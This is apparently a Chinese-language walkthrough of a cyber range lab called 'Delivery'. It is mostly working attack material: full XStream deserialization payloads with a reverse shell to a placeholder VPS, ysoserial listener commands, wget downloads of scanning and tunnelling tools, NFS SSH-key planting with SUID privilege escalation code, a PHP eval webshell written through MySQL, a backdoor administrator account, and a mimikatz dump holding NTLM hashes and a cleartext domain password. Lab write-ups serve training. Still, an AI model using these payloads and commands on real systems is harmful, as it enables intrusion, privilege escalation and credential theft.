晚上没课,开把!
这次发现平台还多了些靶场的关卡剧情,相当于提示吧,可以引导玩家去完整靶标
春秋云境-Delivery
XStream反序列化
1
| .\fscan64.exe -h 121.89.204.46 -p 1-65535
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 121.89.204.46 is alive
[*] Icmp alive hosts len is: 1
121.89.204.46:80 open
121.89.204.46:21 open
121.89.204.46:22 open
121.89.204.46:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://121.89.204.46 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://121.89.204.46:8080 code:200 len:3655 title:公司发货单
[+] ftp://121.89.204.46:21:anonymous
[->]1.txt
[->]pom.xml
已完成 4/4
[*] 扫描结束,耗时: 5m26.9297897s
|
有个80、8080,还有个ftp的匿名登录,里面还扫出来2个文件,先连接看看
把两个都下载下来看看
在pom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| <?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/>
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
|
可以看到网站的依赖:cc3.2.1和xstream1.4.16
而xstream:< 1.4.18存在多个cve,刚好打过:一些cve的复现
这里我选择拿CVE-2021-39149打的,这个cve限制更少,byte-array那里是用ysoserial指定cc10生成的
这里我是使用的woodpecker框架自带的xstream反序列payload生成插件直接生成的,再把其中的值替换到下面的exp上
反弹shell命令生成:java命令执行payloads - 小草窝博客
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| <linked-hash-set>
<dynamic-proxy>
<interface>map</interface>
<handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
<classToInvocationHandler class='linked-hash-map'/>
<defaultHandler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Object</providerType>
<probes>
<entry>
<method>
<class>java.lang.Object</class>
<name>hashCode</name>
<parameter-types/>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADEAJgEADlQ4ODU5NjEzNTAzOTAwBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEAClNvdXJjZUZpbGUBABNUODg1OTYxMzUwMzkwMC5qYXZhAQAIPGNsaW5pdD4BAAMoKVYBAARDb2RlAQARamF2YS9sYW5nL1J1bnRpbWUHAAoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAMAA0KAAsADgEAEGphdmEvbGFuZy9TdHJpbmcHABABAAY8aW5pdD4BAAUoW0IpVgwAEgATCgARABQBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAWABcKAAsAGAEADVN0YWNrTWFwVGFibGUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwAbAQAUamF2YS9pby9TZXJpYWxpemFibGUHAB0BABBzZXJpYWxWZXJzaW9uVUlEAQABSgWtIJPzkd3vPgEADUNvbnN0YW50VmFsdWUMABIACAoAHAAkACEAAgAcAAEAHgABABoAHwAgAAEAIwAAAAIAIQACAAgABwAIAAEACQAAArIACAACAAACnacAAwFMuAAPuwARWRBdvAhZAxBikVRZBBBhkVRZBRBzkVRZBhBokVRZBxAgkVRZCBAtkVRZEAYQY5FUWRAHECCRVFkQCBB7kVRZEAkQZZFUWRAKEGORVFkQCxBokVRZEAwQb5FUWRANECyRVFkQDhBZkVRZEA8QbZFUWRAQEEaRVFkQERB6kVRZEBIQYZFUWRATEEORVFkQFBBBkVRZEBUQdJFUWRAWEGGRVFkQFxBTkVRZEBgQQZFUWRAZECuRVFkQGhBKkVRZEBsQaZFUWRAcEEGRVFkQHRB2kVRZEB4QWpFUWRAfEEeRVFkQIBBWkVRZECEQMpFUWRAiEEyRVFkQIxAzkVRZECQQUpFUWRAlEGqRVFkQJhBjkVRZECcQQ5FUWRAoEDiRVFkQKRA0kVRZECoQTJFUWRArEGqRVFkQLBBFkVRZEC0QepFUWRAuEE2RVFkQLxBDkVRZEDAQNJFUWRAxEHqRVFkQMhBOkVRZEDMQU5FUWRA0EDSRVFkQNRB4kVRZEDYQTpFUWRA3EESRVFkQOBBnkVRZEDkQdpFUWRA6EE6RVFkQOxB6kVRZEDwQY5FUWRA9EDORVFkQPhBOkVRZED8QeZFUWRBAEEGRVFkQQRB3kVRZEEIQUJFUWRBDEGmRVFkQRBBZkVRZEEUQeJFUWRBGEH2RVFkQRxB8kVRZEEgQe5FUWRBJEGKRVFkQShBhkVRZEEsQc5FUWRBMEGWRVFkQTRA2kVRZEE4QNJFUWRBPECyRVFkQUBAtkVRZEFEQZJFUWRBSEH2RVFkQUxB8kVRZEFQQe5FUWRBVEGKRVFkQVhBhkVRZEFcQc5FUWRBYEGiRVFkQWRAskVRZEFoQLZFUWRBbEGmRVFkQXBB9kVS3ABW2ABlXsQAAAAEAGgAAAAMAAQMAAQASAAgAAQAJAAAAEQABAAEAAAAFKrcAJbEAAAAAAAEABQAAAAIABg==</byte-array>
<byte-array>yv66vgAAADEAEwEAA0ZvbwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAIRm9vLmphdmEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQcABwEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQEABjxpbml0PgEAAygpVgwADgAPCgAEABABAARDb2RlACEAAgAEAAEACAABABoACQAKAAEADQAAAAIACwABAAEADgAPAAEAEgAAABEAAQABAAAABSq3ABGxAAAAAAABAAUAAAACAAY=</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</proxy>
<implementing__method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</defaultHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>
|
在8080端口那个服务抓包,post传入payload,这次直接传就好了,不需要url编码
弹上来就是root权限
CVE-2021-39149的打法有个好处就是可以直接弹shell,vps不需要再用ysoserial开启监听
当然看别人wp也可以用CVE-2021-29505,配合cc链打反序列化
先vps用ysoserial开启监听,并指定cc6链,因为cc6不受jdk版本限制
1
| java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections6 "base64编码shell"
|
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
| <java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: none</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>vpsid</string>
<int>vpsport</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>vpsip</host>
<port>vpsport</port>
</ctx>
</candidates>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
|
再nc就行了
内网信息收集、搭代理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| root@ubuntu:/# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.13.14 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe0e:5893 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:0e:58:93 txqueuelen 1000 (Ethernet)
RX packets 459875 bytes 208107117 (208.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 359412 bytes 22970196 (22.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 858 bytes 75665 (75.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 858 bytes 75665 (75.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
wget下载一下fscan和frpc
1
2
3
4
5
| wget http://ip/fscan_amd64
wget http://ip/frpc
wget http://ip/frpc.toml
chmod 777 *
|
先扫内网
1
| ./fscan_amd64 -h 172.22.13.14/24
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.6:88 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
[*] alive ports len is: 16
start vulscan
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] mysql:172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 17.154435015s
|
搭代理
1
2
| ./frps -c ./frps.toml // vps
./frpc -c ./frpc.toml // 受害机
|
分析一下刚才收集到的信息
1
2
3
4
| 172.22.13.14 已拿下
172.22.13.57 CentOS系统 非域内机器
172.22.13.28 80端口存在OA办公平台 Windows Server 2016
172.22.13.6 域控XIAORANG\WIN-DC
|
还获取到了mysql弱口令
1
| mysql:172.22.13.28:3306:root 123456
|
NFS挂载ssh连接
其实按道理来说,在已经扫到mysql弱口令的时候,应该先去常拿那个试,而且那个是域内机子
但由于靶标写了第二关是这个CentOS,这里先打这个CentOS系统。其实顺序倒没有什么,因为一个是域内机器,一个不是,先把这个非域内机子打了,再去专心打域也可以
提示:
为了实现跨机器和跨操作系统的文件共享,管理员在内网部署了 NFS,然而这个决策却使得该服务器陷入了潜在的安全风险。你的任务是尝试获取该服务器的控制权,以评估安全性。
NFS 默认端口 2049
NFS是一种基于TCP/IP 传输的网络文件系统协议。通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源
扫一下端口
1
| ./fscan_amd64 -h 172.22.13.57 -p 1-65535
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 1
172.22.13.57:22 open
172.22.13.57:111 open
172.22.13.57:80 open
172.22.13.57:2049 open
172.22.13.57:20048 open
172.22.13.57:32913 open
172.22.13.57:45519 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
已完成 7/7
[*] 扫描结束,耗时: 6.657063117s
|
只扫了一次,可能有些误报,但是2049应该是开的
1
2
3
| proxychains4 -q showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
|
可以发现能够挂载/home/joyce目录
直接在172.22.13.14的机子上进行挂载
但需要先更新一下连上去的那台机子上的依赖,再安装nfs-common软件包
1
2
3
| sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y
|
在/tmp创建一个目录aaa,然后挂载
1
2
3
4
| cd /tmp
mkdir aaa
mount -t nfs 172.22.13.57:/home /tmp/aaa -o nolock
// 测试后只能挂载目标的/home目录
|
执行
可以看到成功挂载。cd过去看看有啥
只有/home/joyce,这里可以尝试写ssh公钥,再进行连接
1
2
3
4
| ssh-keygen -t rsa -b 4096
cd /tmp/aaa/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /tmp/aaa/joyce/.ssh/authorized_keys
|
1
2
| python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
|
发现权限不够读取/flag02.txt
no_root_squash编译高权限shell
这里使用NFS 提权 参考: https://xz.aliyun.com/t/11664,或者也可以使用ftp的suid来提权
root_squash和no_root_squash是NFS(Network File System)服务器上的两个选项,用于控制对共享文件系统中root用户的访问权限。
root_squash:当客户端以root用户身份连接到NFS服务器时,该选项将把root用户的权限映射为匿名用户(通常是nobody或nfsnobody),从而限制其对共享文件系统的访问权限。这样可以提高系统的安全性,防止恶意root用户对共享文件系统进行未经授权的访问或修改。
no_root_squash:与root_squash相反,当客户端以root用户身份连接到NFS服务器时,该选项将保留root用户的权限,允许其对共享文件系统拥有完全的访问权限。这样可以提供更高的灵活性,但也会增加系统的安全风险,因为root用户可能会对共享文件系统进行未经授权的访问或修改。
写入2.c
1
2
3
4
5
6
7
| #include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("bash");
}
|
然后
1
2
3
| chmod -s 2.c
gcc 2.c -o 2
chmod +s 2
|
拿到root,读取flag
根目录下还有个pAss.txt文件,里面有一个凭据
1
| xiaorang.lab/zhangwen\QT62f3gBhK1
|
应该可以通过这个rdp,如果3389开放的话
拿下这个非域内机器,该回去打域了
mysql弱口令写Webshell
这里挂上代理后,尝试连接mysql
这里的secure_file_priv是空的,所以可以写文件上去
查看mysql服务配置详情
发现是以phpstudy起的服务,而phpstudy通常是以高权限运行的
写webshell
1
| select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
|
蚁剑连接
可以直接读Administrator目录的flag,证明应该是system权限
虚拟终端,创建高权限用户,用于远程连接
1
2
| net user hey qwer1234! /add
net localgroup administrators hey /add
|
Write DACL进行DCSync
远程连接上,传Sharphound和mimikatz
而不知道为什么添加的hey用户采集不到信息,应该还是用户组和权限设置的问题,切换去蚁剑虚拟终端执行
1
| SharpHound.exe --CollectionMethods ALL --Domain XIAORANG.LAB
|
下载下来分析
CHENGLEI这个用户是ACL Admins组的,对WIN-DC具有WriteDacl权限,可以通过写DCSync拿域控
先抓一下密码吧
1
| mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
| .
.
'
'
mimikatz(commandline)
Privilege '20' OK
mimikatz(commandline)
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline)
Authentication Id : 0 ; 15522640 (00000000:00ecdb50)
Session : RemoteInteractive from 2
User Name : hey
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/3/4 20:59:12
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : hey
* Domain : WIN-HAUWOLAO
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 15499913 (00000000:00ec8289)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 20:59:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 86094 (00000000:0001504e)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/3/4 18:58:45
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 52684 (00000000:0000cdcc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 24203 (00000000:00005e8b)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 15522599 (00000000:00ecdb27)
Session : RemoteInteractive from 2
User Name : hey
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/3/4 20:59:12
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : hey
* Domain : WIN-HAUWOLAO
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 15499892 (00000000:00ec8274)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 20:59:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
